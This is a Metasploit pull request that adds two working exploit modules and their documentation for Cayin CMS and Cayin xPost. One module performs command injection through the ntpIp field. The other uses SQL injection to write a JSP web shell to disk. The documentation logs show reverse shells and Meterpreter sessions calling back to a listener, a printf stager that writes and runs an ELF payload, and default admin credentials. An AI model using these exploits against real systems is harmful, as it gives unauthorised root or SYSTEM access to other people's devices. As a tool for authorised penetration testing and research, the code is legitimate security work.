### PR TITLE
Cayin xPost and CMS exploits

### DIFF
--- a/documentation/modules/exploit/linux/http/cayin_cms_ntp.md
+++ b/documentation/modules/exploit/linux/http/cayin_cms_ntp.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+This module exploits an authenticated RCE in Cayin CMS <= 11.0. The
+RCE is executed in the `system_service.cgi` file's `ntpIp` Parameter.
+The field is limited in size, so repeated requests are made to
+achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04
+(20.04 failed to install correctly), so the environment should be
+pretty set and not dynamic between targets. Results in root level
+access.
+
+With CMS-SE's UI there are several options for NTP server.
+
+  1. Test (this runs the RCE 3 times, thus is exploitable, a different
+strategy like `wget` would be required)
+  2. Save (saves the data, but doesn't run it)
+  3. Update (what was used in this exploit)
+
+Default authentication for the system is administrator:admin from
+[Guide](http://onlinehelp.cayintech.com/cmsServer/MCS110EN-01/Web_Manager.html)
+
+## Verification Steps
+
+  1. Install the application on Ubuntu 16.04
+  2. Start msfconsole
+  3. Do: ```exploits/linux/http/cayin_cms_ntp```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```run```
+  6. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04
+
+```
+[*] Processing cayin_cms.rb for ERB directives.
+resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
+resource (cayin_cms.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (cayin_cms.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (cayin_cms.rb)> set lport 6666
+lport => 6666
+resource (cayin_cms.rb)> set verbose true
+verbose => true
+resource (cayin_cms.rb)> check
+[+] Cayin CMS install detected
+[*] 2.2.2.2:80 - The service is running, but could not be validated.
+resource (cayin_cms.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:6666 
+[+] Cayin CMS install detected
+[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
+[*] Command Stager progress -  26.60% done (199/748 bytes)
+[*] Command Stager progress -  53.07% done (397/748 bytes)
+[*] Command Stager progress -  79.81% done (597/748 bytes)
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (980808 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
+[*] Command Stager progress - 100.00% done (748/748 bytes)
+
+meterpreter > getuid
+Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
+meterpreter > sysinfo
+Computer     : CMS-SE
+OS           : Ubuntu 16.04 (Linux 4.4.0-179-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```

--- a/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
+++ b/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
@@ -1,8 +1,12 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. 
+The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can 
+injected with a blind SQLi. Since this app bundles MySQL and Apache 
+Tomcat the environment is pretty static and therefore the default 
+settings should work. Results in SYSTEM level access. Only the 
+`java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem 
+to be valid.
 
 Default authentication for the system is administrator:admin from
 [Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16

--- a/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
+++ b/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
@@ -1,0 +1,62 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+Default authentication for the system is administrator:admin from
+(Guide)[http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf] page 16
+
+## Verification Steps
+
+  1. Install the application and start it
+  2. Start msfconsole
+  3. Do: ```exploit/windows/http/cayin_xpost_sql_rce```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```run```
+  6. You should get a shell.
+
+## Options
+
+### LOCALWEBROOT
+
+Path to the `webapps` folder for Cayin.  Defaults to `C:/CayinApps/webapps/`
+
+## Scenarios
+
+### Cayin xPost 2.5 on Windows 10.0.16299.125
+
+  ```
+  [*] Processing xpost.rb for ERB directives.
+  resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
+  resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
+  payload => java/jsp_shell_reverse_tcp
+  resource (xpost.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (xpost.rb)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (xpost.rb)> set verbose true
+  verbose => true
+  resource (xpost.rb)> exploit
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  [*] Utilizing payload filename cY0bWf1Rh6C9.jsp
+  [*] Payload Size: 1499
+  [*] Payload Size Encoded: 2998
+  [*] Attempting Exploitation
+  [*] Triggering uploaded payload
+  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
+  [!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
+  
+  
+  C:\CayinApps\Tomcat>
+  C:\CayinApps\Tomcat>whoami
+  whoami
+  nt authority\system
+  
+  C:\CayinApps\Tomcat>ver
+  ver
+  
+  Microsoft Windows [Version 10.0.16299.125]
+  
+  C:\CayinApps\Tomcat>
+  ```

--- a/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
+++ b/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
@@ -2,7 +2,7 @@
 
 This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. 
 The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can 
-injected with a blind SQLi. Since this app bundles MySQL and Apache 
+be injected with a blind SQLi. Since this app bundles MySQL and Apache 
 Tomcat the environment is pretty static and therefore the default 
 settings should work. Results in SYSTEM level access. Only the 
 `java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem 

--- a/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
+++ b/documentation/modules/exploit/windows/http/cayin_xpost_sql_rce.md
@@ -5,7 +5,7 @@ files, as well as instructions on installing/configuring the environment if it i
 standard install. Much of this will come from the PR, and can be copy/pasted.
 
 Default authentication for the system is administrator:admin from
-(Guide)[http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf] page 16
+[Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16
 
 ## Verification Steps
 

--- a/modules/exploits/linux/http/cayin_cms_ntp.rb
+++ b/modules/exploits/linux/http/cayin_cms_ntp.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @cookie = login
-    execute_cmdstager(flavor: :printf, linemax: 200, nodelete: true)
+    execute_cmdstager(flavor: :printf, linemax: 200)
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end

--- a/modules/exploits/linux/http/cayin_cms_ntp.rb
+++ b/modules/exploits/linux/http/cayin_cms_ntp.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Cayin CMS NTP Server RCE',
         'Description' => %q{
-          This module exploits an authenticated RCE in Cayin CMS <= 11.0.  The RCE is executed
+          This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed
           in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so
           repeated requests are made to achieve a larger payload.
           Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the
@@ -69,13 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
-      'method' => 'GET'
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi')
     )
 
     if res.nil? || res.code != 200
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
-      return CheckCode::Safe
+      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
     end
 
     if res.body.include?('var model = "CMS') && res.body.include?('STR_CAYIN_LOGO')
@@ -85,8 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     CheckCode::Safe
   rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-    CheckCode::Safe
+    CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
   end
 
   def login
@@ -142,13 +139,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
-    begin
-      @cookie = login
-      execute_cmdstager(flavor: :printf, linemax: 200, nodelete: true)
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-    end
-
+    @cookie = login
+    execute_cmdstager(flavor: :printf, linemax: 200, nodelete: true)
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
 end

--- a/modules/exploits/linux/http/cayin_cms_ntp.rb
+++ b/modules/exploits/linux/http/cayin_cms_ntp.rb
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' =>
           [
             [ 'EDB', '48553' ],
-            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ]
+            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
+            [ 'CVE', '2020-7357' ]
           ],
         'Platform' => ['linux'],
         'DefaultOptions' => {

--- a/modules/exploits/linux/http/cayin_cms_ntp.rb
+++ b/modules/exploits/linux/http/cayin_cms_ntp.rb
@@ -1,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cayin CMS NTP Server RCE',
+        'Description' => %q{
+          This module exploits an authenticated RCE in Cayin CMS <= 11.0.  The RCE is executed
+          in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so
+          repeated requests are made to achieve a larger payload.
+          Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the
+          environment should be pretty set and not dynamic between targets.
+          Results in root level access.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            [ 'EDB', '48553' ],
+            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ]
+          ],
+        'Platform' => ['linux'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+        'Privileged' => true,
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'Jun 4 2020',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']),
+        OptString.new('USERNAME', [true, 'Username to login with', 'administrator']),
+        OptString.new('PASSWORD', [true, 'Username to login with', 'admin']),
+        # from the original advisory, leaving here just in case
+        # OptString.new('USERNAME', [true, 'Username to login with', 'webadmin'])
+        # OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    if res.body.include?('var model = "CMS') && res.body.include?('STR_CAYIN_LOGO')
+      print_good('Cayin CMS install detected')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    CheckCode::Safe
+  end
+
+  def login
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
+      'method' => 'POST',
+      'vars_post' => {
+        'apply_mode' => 'login',
+        'lang' => 'ENG',
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+    # instead of a 302 like most apps, this does a script window.location to forward...
+    unless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi')
+      fail_with(Failure::BadConfig, "#{peer} - Login failed. Check username and password")
+    end
+
+    res.get_cookies
+  end
+
+  def execute_command(cmd, _opts = {})
+    # originally attempted to use the 'test' functionality, however it attempts 3 times which
+    # means our exploit code stage chunks are written 3 times.
+    # also attempted to just 'save', however it doesn't execute an update.
+    # 'update' was the prefered functionality
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'),
+      'method' => 'POST',
+      'cookie' => "#{@cookie} sys=Service",
+      'vars_post' => {
+        'exe' => 'webSvrUpdateNtp',
+        'ntpIp' => "`#{cmd}`"
+
+        # test button, executes 3 times
+        # 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs
+        # 'ntpIp' => "`#{cmd}`"
+
+        # save button, but doesnt execute
+        # 'save' => 'webSvrNtp',
+        # 'ntpIp' => "`#{cmd}`",
+        # 'ntpEnable' => 1,
+        # 'ntp_server' => 0
+      }
+    )
+  end
+
+  def exploit
+    if check != CheckCode::Detected
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+
+    begin
+      @cookie = login
+      execute_cmdstager(flavor: :printf, linemax: 200, nodelete: true)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+  end
+
+end

--- a/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
+++ b/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
@@ -1,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cayin xPost wayfinder_seqid SQLi to RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated SQLi in Cayin xPost <=2.5.  The
+          wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can injected
+          with a blind SQLi.  Since this app bundles MySQL and apache Tomcat the
+          environment is pretty static and therefore the default settings should
+          work.  Results in SYSTEM level access.
+          Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads
+          seem to be valid.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            [ 'EDB', '48558' ],
+            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ]
+          ],
+        'Platform' => ['java', 'win'],
+        'Privileged' => true,
+        'Arch' => ARCH_JAVA,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'Jun 4 2020',
+
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+          },
+        'Payload' => # meterpreter is too large for payload space
+          {
+            'Space' => 2000,
+            'DisableNops' => true
+          },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of Cayin xPost', '/']),
+        OptString.new('LOCALWEBROOT', [true, 'Local install path webroot', 'C:/CayinApps/webapps/' ]), # default location
+        OptString.new('PAYLOADNAME', [false, 'Name of payload file to write', ''])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    %r{// xPost v(?<version>[\d\.]+) } =~ res.body
+
+    if version && Gem::Version.new(version) <= Gem::Version.new('2.5')
+      print_good("Version Detected: #{version}")
+      return CheckCode::Appears
+    end
+
+    # try a backup plan, at least verify the title
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    if res.body =~ %r{<title>xPost</title>}
+      vprint_good('HTML Title includes xPost')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    CheckCode::Safe
+  end
+
+  def exploit
+    filename = datastore['PAYLOADNAME'].blank? ? "#{rand_text_alphanumeric(6..12)}.jsp" : datastore['PAYLOADNAME']
+    filename = "#{filaneme}.jsp" unless filename.end_with? '.jsp'
+
+    vprint_status("Utilizing payload filename #{filename}")
+    vprint_status("Payload Size: #{payload.encoded.length}")
+    vprint_status("Payload Size Encoded: #{payload.encoded.unpack1('H*').length}")
+
+    payload_request = "-251' UNION ALL SELECT 0x"
+    payload_request << payload.encoded.unpack1('H*')
+    payload_request << ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL '
+    payload_request << "INTO DUMPFILE '#{datastore['LOCALWEBROOT']}#{filename}'-- -"
+    payload_request.gsub!(' ', '%20')
+
+    vprint_status('Attempting Exploitation')
+    uri = normalize_uri(target_uri.path, 'cayin', 'wayfinder', 'wayfinder_meeting_input.jsp')
+    # use raw to prevent encoding of injection characters
+    res = send_request_raw(
+      'uri' => "#{uri}?wayfinder_seqid=#{payload_request}",
+      'method' => 'GET'
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+    if res.code == 400
+      fail_with(Failure::UnexpectedReply, "#{peer} - Payload too large, utilize a smaller payload")
+    end
+
+    if res.code != 302
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response to injection")
+    end
+
+    register_file_for_cleanup("#{datastore['LOCALWEBROOT']}#{filename}")
+
+    vprint_status('Triggering uploaded payload')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, filename)
+    )
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+end

--- a/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
+++ b/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' =>
           [
             [ 'EDB', '48558' ],
-            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ]
+            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
+            [ 'CVE', '2020-7356' ]
           ],
         'Platform' => ['java', 'win'],
         'Privileged' => true,

--- a/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
+++ b/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Cayin xPost wayfinder_seqid SQLi to RCE',
         'Description' => %q{
           This module exploits an unauthenticated SQLi in Cayin xPost <=2.5.  The
-          wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can injected
+          wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected
           with a blind SQLi.  Since this app bundles MySQL and apache Tomcat the
           environment is pretty static and therefore the default settings should
           work.  Results in SYSTEM level access.
@@ -73,13 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js'),
-      'method' => 'GET'
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js')
     )
 
     if res.nil? || res.code != 200
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
-      return CheckCode::Safe
+      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
     end
 
     %r{// xPost v(?<version>[\d\.]+) } =~ res.body
@@ -91,13 +89,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # try a backup plan, at least verify the title
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp'),
-      'method' => 'GET'
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp')
     )
 
     if res.nil? || res.code != 200
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
-      return CheckCode::Safe
+      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
+
     end
 
     if res.body =~ %r{<title>xPost</title>}
@@ -106,13 +103,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     CheckCode::Safe
   rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-    CheckCode::Safe
+    CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
   end
 
   def exploit
     filename = datastore['PAYLOADNAME'].blank? ? "#{rand_text_alphanumeric(6..12)}.jsp" : datastore['PAYLOADNAME']
-    filename = "#{filaneme}.jsp" unless filename.end_with? '.jsp'
+    filename = "#{filename}.jsp" unless filename.end_with? '.jsp'
 
     vprint_status("Utilizing payload filename #{filename}")
     vprint_status("Payload Size: #{payload.encoded.length}")
@@ -128,8 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path, 'cayin', 'wayfinder', 'wayfinder_meeting_input.jsp')
     # use raw to prevent encoding of injection characters
     res = send_request_raw(
-      'uri' => "#{uri}?wayfinder_seqid=#{payload_request}",
-      'method' => 'GET'
+      'uri' => "#{uri}?wayfinder_seqid=#{payload_request}"
     )
 
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?

--- a/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
+++ b/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The URI of Cayin xPost', '/']),
         OptString.new('LOCALWEBROOT', [true, 'Local install path webroot', 'C:/CayinApps/webapps/' ]), # default location
         OptString.new('PAYLOADNAME', [false, 'Name of payload file to write', ''])
-      ], self.class
+      ]
     )
   end
 


### PR DESCRIPTION
This PR adds 2 exploits by @liquidworm against Cayin products.

The first is Cayin xPost with an unauthenticated SQLi to RCE on windows.  Luckily they bundle mysql and tomcat, so the env is pretty static.  Gives SYSTEM level access. Once landed, this may be a good candidate for @red0xff to convert to his `sqli` library (and pull the user table, optionally as we discussed in slack).

The second is Cayin CMS (-SE) with an authenticated RCE.  **The guide said to install it on Ubuntu 16.04, my attempt on 20.04 failed, use 16.04!!!** This is a pretty trivial RCE in an NTP field for root access.

## Verification
- [ ] Start `msfconsole`
- [ ] use each module
- [ ] **Verify** you get root/SYSTEM shells
- [ ] **Document** is good and correct.

